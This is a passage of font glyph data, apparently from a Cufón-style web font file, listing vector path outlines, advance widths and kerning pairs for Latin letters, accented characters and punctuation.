}},{"d":"45,-122r210,0r0,30r-210,0r0,-30","w":299},{"d":"60,-99v-32,0,-59,-19,-53,-51v9,2,25,-3,30,2v0,14,9,23,23,23v16,0,28,-10,28,-25v-1,-18,-14,-24,-35,-24r6,-27v28,7,44,-30,16,-33v-12,0,-17,7,-20,16r-30,0v2,-52,96,-55,98,-3v0,20,-15,32,-33,35v17,6,29,17,30,38v1,30,-29,49,-60,49","w":137},{"d":"111,-117r-8,41r-91,0r8,-41r91,0","w":122,"k":{"\u0153":-7,"\u0152":-13,"\u00f8":-7,"\u00d8":-13,"\u00c6":-10,"\u00df":-7,"\u00c5":6,"o":-7,"Y":28,"X":13,"V":8,"T":21,"O":-13,"K":-8,"J":-17,"G":-13,"C":-7,"A":6}},{"d":"4,0r49,-256r50,0r-41,212r84,0r-9,44r-133,0","w":174,"k":{"\u203a":13,"\u2039":26,"\u2019":48,"\u2018":53,"\u201d":48,"\u201c":53,"\u0153":20,"\u0152":26,"\u00bb":13,"\u00ab":26,"\u00f8":20,"\u00e6":20,"\u00d8":26,"y":20,"u":20,"o":20,"e":20,"a":20,"Y":40,"W":6,"V":13,"U":20,"T":26,"O":26,"-":13}},{"d":"145,-102v6,-27,1,-58,-28,-55v-67,4,-53,101,-72,157r-45,0r50,-256r45,0r-15,76v44,-37,127,-12,113,64r-22,116r-46,0","w":209},{"d":"61,-115v0,87,123,92,149,25r-104,0r8,-44r157,0v-5,81,-60,139,-144,139v-70,0,-117,-46,-117,-116v0,-119,121,-187,217,-128v21,13,34,34,40,60r-55,0v-9,-21,-32,-34,-62,-34v-53,-1,-89,43,-89,98","w":281,"k":{"\u2039":6,"\u00ab":6,"Y":13,"T":6,"-":-8}},{"d":"165,-104v-1,-30,-21,-53,-52,-53v-36,-1,-61,31,-60,68v0,29,21,52,50,52v35,0,63,-31,62,-67xm101,5v-54,2,-95,-40,-93,-93v3,-65,40,-109,107,-111v53,-1,96,39,94,93v-3,67,-40,109,-108,111xm113,-264v19,0,46,17,51,-6r18,0v-4,36,-38,43,-71,30v-9,1,-13,6,-16,14r-19,0v7,-21,14,-38,37,-38","w":218},{"d":"89,-248r-68,144r68,145r68,-145xm89,-291r88,187r-88,188r-88,-188","w":177},{"d":"72,5v-43,0,-71,-24,-68,-69v15,1,33,-2,46,1v-5,29,40,38,41,9v-9,-38,-68,-35,-68,-83v0,-34,31,-61,66,-61v36,0,62,24,60,61r-45,0v3,-26,-33,-28,-35,-6v10,29,70,39,70,83v0,38,-30,66,-67,65xm48,-280r21,0r23,35r38,-35r23,0r-45,62r-37,0","w":158},{"d":"-31,0r144,-256r53,0r56,256r-51,0r-12,-54r-105,0r-30,54r-55,0xm149,-102r-19,-91r-50,91r69,0","w":226,"k":{"\u201e":-27,"\u201a":-27,"\u2039":20,"\u2019":36,"\u2018":33,"\u201d":36,"\u201c":33,"\u00ab":20,"w":-7,"t":-7,"Y":6,"W":-13,"T":6,"A":-20,";":-7,":":-7,".":-7,"-":8,",":-7}},{"d":"134,-152v-52,-19,-97,33,-76,87xm80,-42v52,24,105,-38,77,-89xm209,-106v0,85,-84,135,-159,98r-29,34r-22,-22r28,-33v-46,-68,1,-176,91,-169v18,1,32,5,46,11r26,-30r24,21r-26,30v12,16,21,34,21,60","w":218,"k":{"\u201e":-7,"\u201a":-7,"\u2018":6,"\u201c":6,"-":-7}},{"d":"-7,0r8,-40r99,-112r-78,0r7,-41r137,0r-7,38r-99,114r89,0r-7,41r-149,0","w":164},{"w":209},{"d":"205,-284v6,37,-31,78,-58,68v-2,-36,27,-63,58,-68xm224,-130v0,31,18,49,41,59v-21,43,-30,70,-72,77v-9,1,-35,-13,-45,-11v-9,-2,-37,13,-45,11v-54,-12,-79,-76,-83,-136v-3,-49,32,-86,79,-86v13,0,39,12,49,12v20,-7,58,-21,83,-6v10,6,19,12,28,22v-20,14,-35,28,-35,58","w":284},{"d":"127,5v-69,1,-118,-47,-117,-116v2,-92,54,-148,145,-150v70,-2,118,46,116,117v-2,91,-52,148,-144,149xm150,-213v-53,0,-89,43,-89,98v0,43,28,73,70,73v53,0,90,-43,90,-99v0,-44,-27,-72,-71,-72","w":281,"k":{"\u201e":13,"\u201a":13,"\u203a":10,"\u2039":6,"\u2019":16,"\u201d":16,"\u00bb":10,"\u00ab":6,"Y":15,"X":8,";":-7,":":-7,".":15,"-":-10,",":15}},{"d":"112,-92r-81,92r-61,0r117,-134r-63,-122r53,0r46,89r78,-89r57,0r-109,130r66,126r-54,0","w":230,"k":{"\u201e":-13,"\u201a":-13,"\u203a":13,"\u2039":33,"\u0152":6,"\u00bb":13,"\u00ab":33,"\u00d8":6,"e":11,"O":6,"C":13,"-":21}},{"d":"54,76v-56,-11,-74,-62,-56,-125v25,-87,5,-218,122,-212r-9,46v-34,6,-36,22,-44,64r-26,144v-1,18,9,31,22,36","w":106},{"d":"67,-67r-45,0r37,-189r45,0xm54,0r-45,0r10,-48r45,0","w":110},{"d":"129,0r-49,0r38,-194r-64,68r-30,-28r92,-102r63,0","w":209},{"d":"234,-40v9,5,19,8,29,3r-7,41v-25,3,-45,-3,-58,-16v-79,44,-195,0,-189,-99v6,-92,54,-148,145,-150v71,-2,117,47,117,118v-1,45,-14,76,-37,103xm67,-82v10,33,60,50,99,33v-24,-22,-54,-39,-99,-33xm60,-121v63,-9,106,14,137,49v40,-41,29,-141,-47,-141v-52,0,-90,41,-90,92","w":281},{"d":"-8,63r50,-84r-35,-172r48,0r23,121r74,-121r50,0r-158,256r-52,0","w":185,"k":{"\u201e":40,"\u201a":40,"\u203a":6,"\u2039":13,"\u2019":-7,"\u2018":-13,"\u201d":-7,"\u201c":-13,"\u00bb":6,"\u00ab":13,".":38,"-":13,",":38}},{"d":"-4,0r50,-256r47,0r-29,147r81,-84r57,0r-90,93r63,100r-54,0r-59,-97r-19,97r-47,0","w":185,"k":{"\u0153":10,"\u00f8":10,"\u00e6":10,"u":6,"o":10,"e":10,"a":10}},{"d":"-4,0r49,-256r50,0r-49,256r-50,0","w":90},{"d":"-4,0r49,-256r50,0r-49,256r-50,0xm127,-280r-21,0r-23,-36r-38,36r-23,0r45,-62r37,0","w":90},{"d":"-4,0r49,-256r50,0r-49,256r-50,0xm102,-280r-21,0r-53,-62r37,0","w":90},{"d":"-4,0r49,-256r50,0r-49,256r-50,0xm73,-280r-23,0r39,-62r38,0","w":90},{"d":"65,0r-45,0r9,-48r45,0xm184,0r-45,0r9,-48r45,0xm305,0r-45,0r9,-48r45,0","w":360},{"d":"112,-84r22,-112r-87,112r65,0xm144,0r-48,0r8,-42r-111,0r9,-45r137,-169r55,0r-34,172r30,0r-9,42r-29,0","w":209},{"d":"211,-96v-4,-57,104,-70,104,-11v0,43,-50,59,-78,83r67,0r-5,24r-109,0r5,-25v28,-26,77,-43,88,-81v0,-10,-7,-17,-18,-16v-16,1,-23,10,-26,26r-28,0xm226,-261r26,0r-154,266r-26,0xm82,-112r-31,0r24,-109r-41,39r-19,-16r58,-58r40,0","w":323},{"d":"-4,0r49,-256r50,0r-49,256r-50,0xm89,-289r9,-40r36,0r-9,40r-36,0xm28,-289r9,-40r36,0r-9,40r-36,0","w":90},{"d":"38,-261v107,20,45,168,32,252v-9,61,-36,80,-97,85r9,-47v34,-5,37,-23,44,-63r26,-145v0,-18,-10,-30,-23,-36","w":106},{"d":"-7,0r8,-40r99,-112r-78,0r7,-41r137,0r-7,38r-99,114r89,0r-7,41r-149,0xm51,-280r21,0r23,35r38,-35r23,0r-45,62r-37,0","w":164},{"d":"77,-198v-2,-56,24,-63,77,-62r0,32v-81,-21,-4,130,-77,135v42,4,36,51,36,97v0,32,9,39,41,38r0,31v-52,1,-77,-6,-77,-61v0,-48,7,-98,-49,-90r0,-31v54,8,51,-40,49,-89"},{"d":"-4,0r8,-40r136,-172r-100,0r8,-44r162,0r-8,39r-137,172r114,0r-9,45r-174,0xm94,-342r21,0r23,35r38,-35r23,0r-45,62r-37,0","w":210},{"d":"11,-90v0,-91,113,-142,169,-78r5,-25r46,0r-39,195v-3,93,-174,96,-188,11r47,0v9,26,63,32,84,13v8,-8,13,-21,16,-39v-54,46,-140,-2,-140,-77xm107,-37v67,0,85,-120,10,-120v-34,0,-61,32,-61,66v0,31,20,54,51,54xm129,-224v-33,0,-45,-17,-44,-51v6,1,16,-2,20,1v0,18,7,25,26,24v22,0,32,-8,40,-25r20,0v-9,30,-26,51,-62,51","w":231},{"d":"112,-261v46,0,80,28,74,74r-49,0v1,-20,-9,-33,-26,-33v-15,0,-33,14,-30,29v7,40,92,51,92,115v0,48,-38,81,-86,81v-54,0,-84,-31,-82,-87r49,0v-2,26,10,41,33,41v27,0,45,-32,29,-53v-24,-31,-86,-39,-86,-94v0,-45,36,-73,82,-73xm109,46v2,46,-58,42,-96,29r8,-20v18,8,55,18,60,-7v0,-15,-18,-12,-35,-13r12,-35r16,0v-1,5,-6,13,-5,17v23,0,40,7,40,29","w":193},{"d":"127,5v-69,1,-118,-47,-117,-116v2,-92,54,-148,145,-150v70,-2,118,46,116,117v-2,91,-52,148,-144,149xm150,-213v-53,0,-89,43,-89,98v0,43,28,73,70,73v53,0,90,-43,90,-99v0,-44,-27,-72,-71,-72xm157,-280r-23,0r39,-62r38,0","w":281},{"d":"31,47v1,-23,17,-33,34,-47r15,0v-12,11,-22,19,-23,37v-1,18,18,15,34,15r-5,27v-31,1,-56,-3,-55,-32"},{"d":"137,-89v7,-45,45,-129,-20,-129v-60,0,-50,89,-63,145v-8,35,47,45,67,24v7,-7,13,-20,16,-40xm152,-16v-55,46,-167,15,-143,-78v20,-75,18,-167,110,-167v59,0,96,38,81,99v-12,52,-14,117,-48,146","w":209},{"d":"262,-47r15,-63r-55,63r40,0xm283,0r-31,0r5,-24r-69,0r5,-25r86,-94r35,0r-21,96r18,0r-5,23r-18,0xm226,-261r26,0r-154,266r-26,0xm82,-112r-31,0r24,-109r-41,39r-19,-16r58,-58r40,0","w":323},{"d":"328,-256r-50,256r-49,0r39,-207r-103,207r-56,0r-23,-207r-40,207r-50,0r50,-256r77,0r23,194r100,-194r82,0","w":322},{"d":"104,-159r-31,44r-26,-18r34,-43r-50,-14r9,-30r49,16r0,-52r30,0r0,52r48,-16r11,30r-51,13r33,44r-25,19"},{"d":"42,40r34,-189r-58,0r5,-31r59,0r13,-76r41,0r-13,76r59,0r-4,32r-60,0r-32,188r-44,0"},{"d":"131,-42v34,0,57,-17,73,-39r55,0v-19,50,-66,86,-131,86v-75,0,-119,-47,-122,-119v-5,-114,127,-187,222,-123v22,15,35,38,42,65r-55,0v-11,-26,-33,-42,-68,-41v-56,1,-86,39,-89,95v-1,45,30,76,73,76","w":273,"k":{"\u201e":6,"\u201a":6,"\u2039":6,"\u2019":-10,"\u201d":-10,"\u00ab":6,"Y":6,"-":-8}},{"d":"85,-145r-45,0r10,-48r45,0xm9,23v12,-3,17,-10,19,-23r-16,0r9,-48r45,0v-10,45,-7,100,-62,98","w":110},{"d":"111,-221v-29,1,-32,40,-11,56v17,-4,34,-18,34,-35v0,-12,-10,-21,-23,-21xm50,-71v-1,27,33,44,57,26v7,-6,15,-13,22,-23r-46,-49v-17,10,-32,23,-33,46xm5,-68v1,-37,24,-61,50,-78v-35,-45,-2,-115,58,-115v36,0,64,23,64,57v-1,34,-24,55,-50,68r27,28r36,-60r46,0r-53,91r48,51r-34,29r-39,-41v-21,25,-38,42,-77,43v-43,1,-77,-31,-76,-73","w":246},{"d":"0,0r38,-193r44,0r-37,193r-45,0xm63,-218r-23,0r39,-62r38,0","w":84},{"d":"11,-90v0,-91,113,-142,169,-78r5,-25r46,0r-39,193r-44,0r3,-13v-54,46,-140,-2,-140,-77xm107,-37v67,0,85,-120,10,-120v-34,0,-61,32,-61,66v0,31,20,54,51,54xm190,-218r-21,0r-23,-36r-38,36r-23,0r45,-62r37,0","w":231},{"d":"71,-209r81,81r81,-81r20,21r-81,81r81,80r-20,21r-81,-81r-81,81r-21,-21r81,-80r-81,-81","w":299},{"d":"43,-214r8,-42r48,0r-8,42r-48,0xm-43,63r9,-42v28,-1,33,-8,38,-36r34,-178r49,0r-38,196v-6,49,-37,65,-92,60","w":86},{"d":"51,0r20,-97r-54,-159r50,0r35,110r74,-110r57,0r-113,159r-18,97r-51,0xm130,-280r-23,0r39,-62r38,0","w":204},{"d":"145,-182v0,-30,-29,-35,-59,-32r-14,70v39,2,73,-2,73,-38xm197,-181v-3,69,-56,86,-133,81r-20,100r-50,0r50,-256v79,-4,156,-2,153,75","w":201,"k":{"\u201e":93,"\u201a":93,"\u203a":13,"\u2039":26,"\u0153":13,"\u00bb":13,"\u00ab":26,"\u00f8":13,"\u00e6":13,"\u00c5":26,"u":13,"s":10,"r":13,"o":13,"n":13,"i":13,"e":13,"a":13,"Y":13,"A":26,";":10,":":10,".":79,"-":15,",":79}},{"d":"99,-134v35,-2,75,23,103,23v28,-1,46,-12,67,-27r0,33v-20,13,-40,23,-67,24v-34,1,-78,-25,-103,-23v-29,2,-46,12,-68,28r0,-33v20,-13,40,-24,68,-25","w":299},{"d":"115,-218v-30,0,-51,24,-51,56v0,26,18,43,44,43v31,0,51,-23,51,-54v1,-26,-18,-46,-44,-45xm114,-261v70,0,113,71,78,134v-24,41,-80,89,-114,127r-58,0r77,-81v-47,-2,-80,-32,-81,-79v-2,-56,43,-101,98,-101","w":209},{"d":"145,-280r33,0r-47,62r-19,0xm94,-280r33,0r-41,62r-18,0"},{"d":"94,-38v30,0,53,-25,52,-56v-1,-25,-18,-43,-45,-43v-31,0,-50,25,-51,55v-1,26,18,45,44,44xm95,5v-70,0,-113,-71,-78,-134v24,-42,80,-89,114,-127r58,0r-77,82v48,1,81,31,81,79v0,56,-44,100,-98,100","w":209},{"d":"28,0r43,-213r-54,0r8,-43r153,0r-8,43r-49,0r-43,213r-50,0","w":159,"k":{"\u201e":20,"\u201a":20,"\u203a":29,"\u2039":46,"\u0153":29,"\u00bb":29,"\u00ab":46,"\u00f8":29,"\u00e6":29,"\u00c5":16,"y":16,"w":16,"u":16,"s":24,"r":13,"o":29,"i":6,"e":29,"c":29,"a":29,"A":16,";":23,":":23,".":40,"-":33,",":40}},{"d":"69,-252r29,0r0,97r-29,0r0,-97xm15,-252r29,0r0,97r-29,0r0,-97","w":113},{"d":"61,0r-53,0r135,-214r-104,0r8,-42r157,0r-7,42","w":209},{"d":"145,-102v6,-27,1,-58,-28,-55v-67,5,-53,102,-73,157r-44,0r39,-193r40,0r-4,18v39,-44,133,-20,118,59r-22,116r-46,0","w":209,"k":{"\u201e":-7,"\u201a":-7,"\u2019":6,"\u2018":6,"\u201d":6,"\u201c":6}},{"d":"61,-115v0,87,123,92,149,25r-104,0r8,-44r157,0v-5,81,-60,139,-144,139v-70,0,-117,-46,-117,-116v0,-119,121,-187,217,-128v21,13,34,34,40,60r-55,0v-9,-21,-32,-34,-62,-34v-53,-1,-89,43,-89,98xm173,-286v-33,0,-45,-17,-44,-51v6,1,16,-2,20,1v0,18,7,25,26,24v22,0,32,-8,40,-25r20,0v-9,30,-26,51,-62,51","w":281},{"d":"244,-145v0,87,-60,145,-146,145r-96,0r21,-113r-26,0r7,-38r27,0r20,-105r75,0v73,0,118,39,118,111xm192,-140v1,-56,-38,-80,-98,-75r-13,64r53,0r-8,38r-52,0r-14,72v77,8,131,-32,132,-99","w":254,"k":{"\u201e":13,"\u201a":13,"\u203a":6,"\u2039":6,"\u2018":6,"\u201c":6,"\u00bb":6,"\u00ab":6,"Y":13,"W":-7}},{"d":"30,39r32,0r-6,33r-82,0r63,-328r83,0r-7,33r-33,0","w":106},{"d":"49,0r-41,-256r50,0r32,197r103,-197r51,0r-134,256r-61,0","w":214,"k":{"\u201e":40,"\u201a":40,"\u203a":34,"\u2039":50,"\u2019":-10,"\u2018":-7,"\u201d":-10,"\u201c":-7,"\u0153":20,"\u00bb":34,"\u00ab":50,"\u00f8":20,"\u00e6":20,"\u00c5":13,"u":16,"o":20,"e":20,"a":20,"A":13,";":18,":":18,".":46,"-":29,",":46}},{"d":"137,-266v-10,-1,-19,10,-19,19v0,9,9,19,19,18v10,1,19,-9,19,-18v0,-9,-9,-20,-19,-19xm137,-207v-21,0,-40,-19,-40,-40v0,-21,19,-41,40,-41v21,0,40,20,40,41v0,22,-19,40,-40,40xm107,-37v67,0,85,-120,10,-120v-34,0,-61,32,-61,66v0,31,20,54,51,54xm11,-90v0,-91,113,-142,169,-78r5,-25r46,0r-39,193r-44,0r3,-13v-54,46,-140,-2,-140,-77","w":231},{"d":"127,5v-69,1,-118,-47,-117,-116v2,-92,54,-148,145,-150v70,-2,118,46,116,117v-2,91,-52,148,-144,149xm150,-213v-53,0,-89,43,-89,98v0,43,28,73,70,73v53,0,90,-43,90,-99v0,-44,-27,-72,-71,-72xm173,-289r9,-40r36,0r-9,40r-36,0xm112,-289r9,-40r36,0r-9,40r-36,0","w":281},{"d":"0,0r38,-193r44,0r-37,193r-45,0xm117,-218r-21,0r-23,-36r-38,36r-23,0r45,-62r37,0","w":84},{"d":"162,-118v-5,-34,-54,-50,-84,-28v-9,7,-16,16,-21,28r105,0xm52,-80v3,49,76,55,97,19r50,0v-16,39,-48,65,-99,66v-54,2,-95,-40,-93,-93v2,-64,40,-109,107,-110v63,-1,103,51,91,118r-153,0xm171,-218r-21,0r-23,-36r-38,36r-23,0r45,-62r37,0","w":218},{"d":"67,-113v-8,32,-5,71,31,68v40,-4,40,-26,49,-73r27,-138r49,0v-18,75,-23,193,-64,238v-42,45,-164,27,-147,-62r34,-176r49,0","w":220,"k":{"J":6}},{"d":"98,-218r-23,0r39,-62r38,0"},{"d":"0,0r50,-256r45,0r-50,256r-45,0","w":84},{"d":"67,-113v-8,32,-5,71,31,68v40,-4,40,-26,49,-73r27,-138r49,0v-18,75,-23,193,-64,238v-42,45,-164,27,-147,-62r34,-176r49,0xm163,-280r-21,0r-53,-62r37,0","w":220},{"d":"46,-207r207,86r0,28r-207,85r0,-32r165,-67r-165,-67r0,-33","w":299},{"d":"72,5v-43,0,-71,-24,-68,-69v15,1,33,-2,46,1v-5,29,40,38,41,9v-9,-38,-68,-35,-68,-83v0,-34,31,-61,66,-61v36,0,62,24,60,61r-45,0v3,-26,-33,-28,-35,-6v10,29,70,39,70,83v0,38,-30,66,-67,65xm96,46v2,46,-58,42,-96,29r8,-20v18,8,55,18,60,-7v0,-15,-18,-12,-35,-13r12,-35r16,0v-1,5,-6,13,-5,17v23,0,40,7,40,29","w":158},{"d":"0,0r38,-193r44,0r-37,193r-45,0xm79,-227r9,-40r36,0r-9,40r-36,0xm18,-227r9,-40r36,0r-9,40r-36,0","w":84},{"d":"127,-19v-13,28,-68,34,-86,6r-17,89r-40,0r52,-266r40,0r-24,130v-4,40,48,44,66,19v22,-31,28,-102,39,-149r40,0r-29,153v-1,11,7,13,18,12r-6,27v-21,7,-57,6,-53,-21","w":212},{"d":"142,-323v-9,0,-20,9,-19,19v-1,10,10,19,19,19v9,0,19,-9,18,-19v1,-10,-9,-19,-18,-19xm142,-264v-21,0,-40,-18,-40,-40v0,-22,19,-40,40,-40v21,0,40,19,40,40v0,21,-18,40,-40,40xm-31,0r142,-254r55,0r56,254r-51,0r-12,-54r-105,0r-30,54r-55,0xm149,-102r-19,-91r-50,91r69,0","w":226,"k":{"\u201e":-27,"\u201a":-27,"\u2039":20,"\u2019":36,"\u2018":33,"\u201d":36,"\u201c":33,"\u00ab":20,"w":-7,"t":-7,"Y":6,"W":-13,"T":6,";":-7,":":-7,".":-7,"-":8,",":-7}},{"d":"72,5v-43,0,-71,-24,-68,-69v15,1,33,-2,46,1v-5,29,40,38,41,9v-9,-38,-68,-35,-68,-83v0,-34,31,-61,66,-61v36,0,62,24,60,61r-45,0v3,-26,-33,-28,-35,-6v10,29,70,39,70,83v0,38,-30,66,-67,65","w":158},{"d":"85,-102r-32,0r25,-116r-43,40r-19,-16r60,-62r42,0","w":137},{"d":"68,-118r-23,118r-50,0r49,-256r51,0r-20,101r96,-101r59,0r-117,122r80,134r-56,0","w":205,"k":{"\u201e":-11,"\u201a":-11,"\u203a":13,"\u2039":29,"\u2018":6,"\u201c":6,"\u0153":20,"\u0152":16,"\u00bb":13,"\u00ab":29,"\u00f8":20,"\u00e6":20,"\u00d8":16,"\u00c5":6,"y":6,"u":16,"o":20,"e":20,"a":20,"Y":13,"O":16,"C":16,"A":6,"-":18}},{"d":"141,-194v0,-15,-11,-27,-26,-26v-18,0,-32,14,-32,33v0,16,11,27,27,26v18,0,31,-13,31,-33xm137,-83v0,-22,-15,-37,-38,-37v-24,0,-42,20,-42,46v0,21,15,36,36,36v23,0,44,-22,44,-45xm9,-71v0,-38,22,-59,51,-72v-51,-37,-10,-118,54,-118v41,0,73,24,73,63v0,32,-17,46,-42,56v24,11,38,29,39,61v2,48,-43,86,-92,86v-48,0,-83,-30,-83,-76","w":209},{"d":"122,-156v-33,0,-61,31,-60,65v0,31,20,54,50,54v35,0,62,-31,61,-67v-1,-30,-19,-52,-51,-52xm109,5v-31,0,-47,-9,-62,-26r-5,21r-43,0r50,-256r43,0r-14,75v56,-41,145,3,140,76v-5,66,-41,110,-109,110","w":231},{"d":"160,-178v1,-33,-36,-39,-72,-34r-15,78v47,1,87,-3,87,-44xm212,-180v-1,50,-37,81,-87,84r59,96r-56,0r-59,-114r-22,114r-50,0r49,-256v82,-3,167,-3,166,76","w":219,"k":{"\u201e":6,"\u201a":6,"\u203a":13,"\u2039":24,"\u0153":6,"\u00bb":13,"\u00ab":24,"\u00f8":6,"\u00e6":10,"\u00c5":16,"u":10,"o":6,"e":6,"a":10,"Y":10,"T":6,"A":16,";":6,":":6,".":6,"-":10,",":6}},{"d":"125,-150r-16,45r45,0r16,-45r-45,0xm129,-257r34,0r-27,77r44,0r27,-77r33,0r-27,77r52,0r-11,30r-51,0r-16,45r54,0r-11,30r-54,0r-27,76r-34,0r28,-76r-44,0r-28,76r-34,0r28,-76r-53,0r11,-30r52,0r16,-45r-55,0r10,-30r56,0","w":276},{"d":"243,-20v-23,1,-37,-8,-37,-30v-11,18,-26,30,-53,30v-37,0,-54,-22,-55,-59v-1,-50,35,-99,83,-98v23,0,34,9,43,25r10,-19r27,0r-27,112v0,8,7,15,16,14v42,-6,63,-44,64,-89v2,-62,-54,-102,-119,-100v-92,2,-143,56,-149,143v-8,121,164,150,243,87r12,17v-31,23,-69,40,-119,40v-97,0,-165,-50,-165,-145v0,-105,72,-167,179,-167v85,0,147,42,147,125v0,63,-36,110,-100,114xm130,-78v0,36,39,46,60,24v22,-23,46,-99,-6,-101v-33,-1,-54,41,-54,77","w":360},{"d":"165,-104v-1,-30,-21,-53,-52,-53v-36,-1,-61,31,-60,68v0,29,21,52,50,52v35,0,63,-31,62,-67xm101,5v-54,2,-95,-40,-93,-93v3,-65,40,-109,107,-111v53,-1,96,39,94,93v-3,67,-40,109,-108,111xm121,-218r-23,0r39,-62r38,0","w":218},{"d":"15,-256r51,0r-1,199r90,-199r59,0r2,205r87,-205r52,0r-118,256r-61,0r-3,-202r-89,202r-62,0","w":327,"k":{"\u201e":33,"\u201a":33,"\u203a":26,"\u2039":40,"\u2019":-7,"\u2018":-7,"\u201d":-7,"\u201c":-7,"\u0153":13,"\u00bb":26,"\u00ab":40,"\u00f8":13,"\u00e6":13,"\u00c5":6,"u":8,"r":13,"o":13,"e":13,"a":13,"A":6,";":15,":":15,".":38,"-":21,",":38}},{"d":"65,-89v-7,28,-2,57,28,55v67,-5,54,-103,73,-159r44,0r-39,193r-40,0r4,-16v-39,42,-132,21,-118,-60r21,-117r47,0xm140,-227r9,-40r36,0r-9,40r-36,0xm79,-227r9,-40r36,0r-9,40r-36,0","w":209},{"d":"198,-294r35,0r0,19r-19,0r-104,282r-15,0r-55,-153r-23,9r-5,-17r53,-19r44,121","w":232},{"d":"165,-104v-1,-30,-21,-53,-52,-53v-36,-1,-61,31,-60,68v0,29,21,52,50,52v35,0,63,-31,62,-67xm101,5v-54,2,-95,-40,-93,-93v3,-65,40,-109,107,-111v53,-1,96,39,94,93v-3,67,-40,109,-108,111xm175,-218r-21,0r-23,-36r-38,36r-23,0r45,-62r37,0","w":218},{"d":"53,-89v-4,59,84,67,102,21r47,0v-13,42,-48,73,-100,73v-55,1,-94,-39,-94,-93v0,-117,175,-153,199,-37r-46,0v-21,-55,-117,-29,-108,36","w":210},{"d":"65,-89v-7,28,-2,57,28,55v67,-5,54,-103,73,-159r44,0r-39,193r-40,0r4,-16v-39,42,-132,21,-118,-60r21,-117r47,0xm178,-218r-21,0r-23,-36r-38,36r-23,0r45,-62r37,0","w":209},{"d":"11,-90v0,-91,113,-142,169,-78r5,-25r46,0r-39,193r-44,0r3,-13v-54,46,-140,-2,-140,-77xm107,-37v67,0,85,-120,10,-120v-34,0,-61,32,-61,66v0,31,20,54,51,54xm136,-218r-23,0r39,-62r38,0","w":231},{"d":"-31,0r144,-256r53,0r56,256r-51,0r-12,-54r-105,0r-30,54r-55,0xm149,-102r-19,-91r-50,91r69,0xm158,-289r9,-40r36,0r-9,40r-36,0xm97,-289r9,-40r36,0r-9,40r-36,0","w":226},{"d":"10,-199v0,-73,87,-61,160,-61r0,17r-20,0r0,243r-23,0r0,-243r-29,0r0,243r-23,0r0,-138v-37,-1,-65,-23,-65,-61"},{"d":"65,-193r30,60r51,-60r55,0r-83,94r53,99r-54,0r-32,-64r-54,64r-55,0r86,-101r-50,-92r53,0"},{"d":"11,-90v0,-91,113,-142,169,-78r5,-25r46,0r-39,195v-3,93,-174,96,-188,11r47,0v9,26,63,32,84,13v8,-8,13,-21,16,-39v-54,46,-140,-2,-140,-77xm107,-37v67,0,85,-120,10,-120v-34,0,-61,32,-61,66v0,31,20,54,51,54","w":231},{"d":"45,-86r210,0r0,29r-210,0r0,-29xm45,-158r210,0r0,29r-210,0r0,-29","w":299},{"d":"-8,63r50,-84r-35,-172r48,0r23,121r74,-121r50,0r-158,256r-52,0xm116,-227r9,-40r36,0r-9,40r-36,0xm55,-227r9,-40r36,0r-9,40r-36,0","w":185},{"d":"27,-256r30,0r21,289r-31,0","w":100},{"d":"75,-275r31,0r0,360r-31,0r0,-360"},{"d":"65,-30v-62,-18,-75,-117,-30,-165v18,-20,40,-31,68,-33r7,-37r39,0r-8,41v32,12,50,35,57,71r-42,0v-21,-66,-109,-32,-103,31v-6,57,78,67,96,22r44,0v-12,40,-43,72,-90,74r-8,40r-39,0","w":209},{"d":"-4,0r49,-256r138,0r-8,44r-88,0r-12,60r88,0r-8,44r-88,0r-21,108r-50,0","w":177,"k":{"\u201e":66,"\u201a":66,"\u203a":6,"\u2039":13,"\u2019":-7,"\u201d":-7,"\u00bb":6,"\u00ab":13,"\u00c5":16,"u":13,"r":13,"i":13,"A":16,";":15,":":15,".":58,"-":6,",":58}},{"d":"131,-42v34,0,57,-17,73,-39r55,0v-19,50,-66,86,-131,86v-75,0,-119,-47,-122,-119v-5,-114,127,-187,222,-123v22,15,35,38,42,65r-55,0v-11,-26,-33,-42,-68,-41v-56,1,-86,39,-89,95v-1,45,30,76,73,76xm163,46v2,46,-58,42,-96,29r8,-20v18,8,55,18,60,-7v0,-15,-18,-12,-35,-13r12,-35r16,0v-1,5,-6,13,-5,17v23,0,40,7,40,29","w":273},{"d":"11,-90v0,-91,113,-142,169,-78r5,-25r46,0r-39,193r-44,0r3,-13v-54,46,-140,-2,-140,-77xm107,-37v67,0,85,-120,10,-120v-34,0,-61,32,-61,66v0,31,20,54,51,54","w":231},{"d":"162,-118v-5,-34,-54,-50,-84,-28v-9,7,-16,16,-21,28r105,0xm52,-80v3,49,76,55,97,19r50,0v-16,39,-48,65,-99,66v-54,2,-95,-40,-93,-93v2,-64,40,-109,107,-110v63,-1,103,51,91,118r-153,0","w":218},{"d":"22,33r-30,0r84,-289r30,0","w":100},{"d":"-5,0r50,-256r143,0r-8,44r-93,0r-12,60r93,0r-9,44r-92,0r-13,65r93,0r-9,43r-143,0xm118,-280r-23,0r39,-62r38,0"},{"d":"0,0r38,-193r44,0r-37,193r-45,0xm42,-214r8,-42r45,0r-9,42r-44,0","w":84},{"d":"65,-89v-7,28,-2,57,28,55v67,-5,54,-103,73,-159r44,0r-39,193r-40,0r4,-16v-39,42,-132,21,-118,-60r21,-117r47,0xm153,-218r-21,0r-53,-62r37,0","w":209},{"d":"41,-70v-4,29,31,37,46,20v25,-58,29,-140,46,-206r49,0r-36,189v-7,45,-34,71,-82,72v-48,0,-76,-27,-71,-75r48,0","w":178,"k":{"\u201e":13,"\u201a":13,"\u203a":6,"\u2039":13,"\u00bb":6,"\u00ab":13}},{"d":"145,-102v6,-27,1,-58,-28,-55v-67,5,-53,102,-73,157r-44,0r39,-193r40,0r-4,18v39,-44,133,-20,118,59r-22,116r-46,0xm112,-264v19,0,46,17,51,-6r18,0v-4,36,-38,43,-71,30v-9,1,-13,6,-16,14r-19,0v7,-21,14,-38,37,-38","w":209},{"d":"0,0r38,-193r44,0r-37,193r-45,0xm92,-218r-21,0r-53,-62r37,0","w":84},{"d":"99,-185v12,-2,17,-10,19,-22r-17,0r10,-49r45,0v-10,46,-8,100,-63,99xm32,-185v12,-2,17,-10,19,-22r-16,0r9,-49r45,0v-10,46,-8,100,-63,99","w":152},{"d":"67,-113v-8,32,-5,71,31,68v40,-4,40,-26,49,-73r27,-138r49,0v-18,75,-23,193,-64,238v-42,45,-164,27,-147,-62r34,-176r49,0xm150,-289r9,-40r36,0r-9,40r-36,0xm89,-289r9,-40r36,0r-9,40r-36,0","w":220},{"d":"11,-90v0,-91,113,-142,169,-78r17,-88r45,0r-49,256r-45,0r3,-13v-54,46,-140,-2,-140,-77xm107,-37v67,0,85,-120,10,-120v-34,0,-61,32,-61,66v0,31,2